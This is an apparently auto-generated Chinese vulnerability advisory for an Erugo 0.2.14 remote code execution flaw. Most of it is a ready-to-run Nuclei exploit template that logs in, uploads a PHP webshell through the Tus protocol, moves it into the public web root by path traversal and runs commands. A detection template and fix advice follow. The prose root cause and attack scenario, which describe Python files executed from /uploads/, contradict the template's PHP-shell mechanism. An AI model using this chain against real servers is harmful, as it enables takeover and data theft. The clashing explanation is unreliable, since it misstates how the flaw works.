[webapps] Erugo 0.2.14 - Remote Code Execution (RCE)
CVE-2026-24897
Erugo 0.2.14版本中存在远程代码执行漏洞,攻击者可利用文件上传功能执行任意Python代码。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2026-24897 |
|---|---|
| 漏洞类型 | 文件上传导致的远程代码执行 |
| 受影响版本 | Erugo <= 0.2.14 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-30 |
| 提交者 | Abdul Moiz |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在文件上传功能中,服务器未对上传文件的扩展名和内容进行有效校验,导致用户可上传包含恶意Python代码的.py文件,并通过直接访问上传路径触发执行。具体涉及/uploads/目录的文件存储和静态文件服务的配置缺陷。
🎯 攻击场景
1. 攻击者构造一个包含恶意Python代码的.py文件(例如执行系统命令)。 2. 通过Erugo的文件上传功能上传该文件到服务器。 3. 服务器将文件保存至可被公开访问的/uploads/目录下。 4. 攻击者直接通过HTTP GET请求访问上传的.py文件。 5. 服务器配置将.py文件作为脚本执行,导致远程代码执行。 成功标志:在服务器上执行任意命令,获得shell或执行敏感操作。
💥 漏洞影响
攻击者可利用该漏洞在目标服务器上执行任意系统命令,导致完全远程控制、数据泄露、服务器被植入后门等严重危害。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-24897-exploit
info:
name: Erugo <= 0.2.14 - Authenticated Remote Code Execution (RCE)
author: nuclei-template-generator
severity: critical
description: |
Erugo <= 0.2.14 is vulnerable to authenticated RCE. An authenticated user can upload a PHP webshell via the Tus protocol, then exploit a path traversal vulnerability in the share creation API to move the shell into the public web root, achieving remote code execution.
reference:
- https://github.com/ErugoOSS/Erugo
- https://www.exploit-db.com/exploits/CVE-2026-24897
tags: erugo,rce,exploit,cve-2026-24897,authenticated,path-traversal,tus
variables:
username: "admin@example.com"
password: "password"
cmd: "id"
shell_name: "nucleirce.php"
shell_content: "<?php system($_GET[\"cmd\"]); ?>"
http:
# Step 1: Login and extract Bearer token
- raw:
- |
POST /api/auth/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/json
User-Agent: Mozilla/5.0 (Exploit-DB)
{"email":"{{username}}","password":"{{password}}"}
matchers:
- type: status
status:
- 200
extractors:
- type: json
name: token
part: body
json:
- ".data.access_token"
internal: true
# Step 2: Tus Protocol - Create upload (POST to get Location header)
- raw:
- |
POST /files/ HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Accept: application/json
User-Agent: Mozilla/5.0 (Exploit-DB)
Tus-Resumable: 1.0.0
Upload-Length: 30
Upload-Metadata: filename bnVjbGVpcmNlLnBocA==,filetype YXBwbGljYXRpb24veC1waHA=
# filename = nucleirce.php (base64: bnVjbGVpcmNlLnBocA==)
# filetype = application/x-php (base64: YXBwbGljYXRpb24veC1waHA=)
matchers:
- type: status
status:
- 201
extractors:
- type: regex
name: file_location
part: header
regex:
- "(?i)location:\\s*(.+)"
group: 1
internal: true
- type: regex
name: file_id
part: header
regex:
- "(?i)location:\\s*.*/files/([^\\s\\r\\n]+)"
group: 1
internal: true
# Step 3: Tus Protocol - Upload PHP shell content (PATCH)
- raw:
- |
PATCH /files/{{file_id}} HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Accept: application/json
User-Agent: Mozilla/5.0 (Exploit-DB)
Tus-Resumable: 1.0.0
Content-Type: application/offset+octet-stream
Upload-Offset: 0
Content-Length: 30
<?php system($_GET["cmd"]); ?>
matchers:
- type: status
status:
- 204
# Step 4: Create malicious share with path traversal to move shell to public root
- raw:
- |
POST /api/uploads/create-share-from-uploads HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
Content-Type: application/json
Accept: application/json
User-Agent: Mozilla/5.0 (Exploit-DB)
{
"upload_id": "exploit",
"name": "exploit_share",
"recipients": [],
"uploadIds": ["{{file_id}}"],
"filePaths": {
"{{file_id}}": "../../../../../public/{{shell_name}}"
},
"expiry_date": "2099-12-31T23:59:59.000Z",
"password": "",
"password_confirm": ""
}
matchers:
- type: status
status:
- 200
- 201
# Step 5: Execute command via uploaded webshell and verify RCE
- raw:
- |
GET /{{shell_name}}?cmd={{cmd}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Exploit-DB)
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "uid=[0-9]+\\([^)]+\\)\\s+gid=[0-9]+"
- "root:[x*]:0:0"
- "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+"
condition: or
extractors:
- type: regex
name: rce-output
part: body
regex:
- "uid=[0-9]+\\([^)]+\\).*"
- "(.+)"🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-24897-detection
info:
name: Erugo <= 0.2.14 - Version Detection
author: nuclei-template-generator
severity: critical
description: Detects Erugo instances running version 0.2.14 or earlier that are vulnerable to authenticated RCE via path traversal during file share creation.
reference:
- https://github.com/ErugoOSS/Erugo
- https://www.exploit-db.com/exploits/CVE-2026-24897
tags: erugo,rce,detection,cve-2026-24897
variables:
target_path: "/login"
http:
- method: GET
path:
- "{{BaseURL}}/login"
- "{{BaseURL}}/api/auth/login"
- "{{BaseURL}}/"
matchers-condition: or
matchers:
- type: word
name: erugo-login-page
words:
- "Erugo"
- "erugo"
condition: or
part: body
- type: word
name: erugo-api-endpoint
words:
- "access_token"
- "auth/login"
condition: or
part: body
- type: status
status:
- 200
- 302
extractors:
- type: regex
name: erugo-version
part: body
regex:
- "(?i)erugo[^0-9]*([0-9]+\\.[0-9]+\\.[0-9]+)"
- "version[\"']?\\s*[:\\s]+[\"']?([0-9]+\\.[0-9]+\\.[0-9]+)"🛡️ 修复建议
1. 升级至Erugo 0.2.15或更高版本(官方已修复)。 2. 临时缓解措施:在Web服务器配置中禁止上传目录下的脚本文件执行(例如禁用.py文件在/uploads/目录下的解析)。 3. 对上传文件进行更严格的扩展名和内容白名单校验。
📎 参考链接
- https://www.exploit-db.com/exploits/52012
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-24897
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 05:29 | 来源: Exploit-DB